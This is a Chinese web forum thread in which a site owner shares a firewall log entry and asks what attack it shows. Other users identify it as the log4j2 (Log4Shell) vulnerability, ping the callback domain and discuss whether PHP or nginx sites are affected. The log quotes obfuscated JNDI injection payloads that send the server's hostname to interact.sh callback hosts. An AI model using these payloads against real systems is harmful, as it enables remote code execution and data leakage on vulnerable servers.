这是个什么攻击方式？

lspro · 发表于 2021-12-14 10:41:08

今早看了下日志，发现有一条这样的的记录

{"client_ip":"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh}","local_time":"2021-12-14 05:58:45","server_name":"xxx.com","req_url":"\/?x=${jndi:ldap:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gg.interact.sh\/a}","attack_method":"Deny_URL_Args","req_data":"-","rule_tag":"\\$\\{","user_agent":"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:\/\/${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7ge.interact.sh}"}

复制代码

居然看不到IP，有带老懂吗

920 · 发表于 2021-12-14 11:20:33

正在 Ping c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh [46.101.25.250] 具有 32 字节的数据:
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=175ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47
来自 46.101.25.250 的回复: 字节=32 时间=176ms TTL=47

loliwin · 发表于 2021-12-14 10:44:47

这不就是大红大紫的log4j漏洞么。

tkn · 发表于 2021-12-14 11:09:48

是 log4j2 漏洞，互联网的小学生都知道了

李嘉诚 · 发表于 2021-12-14 11:11:20

loliwin 发表于 2021-12-14 10:44
这不就是大红大紫的log4j漏洞么。

wp 小站需要怕吗？

920 · 发表于 2021-12-14 11:18:34

wp站不是PHP的嘛，log4j好像是java项目的。是不是有其他组件用到了。没看到IP地址，但是他里面不是有域名嘛.sh的域名

百度网盘 · 发表于 2021-12-14 11:20:55

昨天好几个网站都碰到了这个，宝塔的防火墙还是可以的，都给拦截了

16qf · 发表于 2021-12-14 11:34:04

Apache关我nginx什么事

		自动登录	找回密码
密码			注册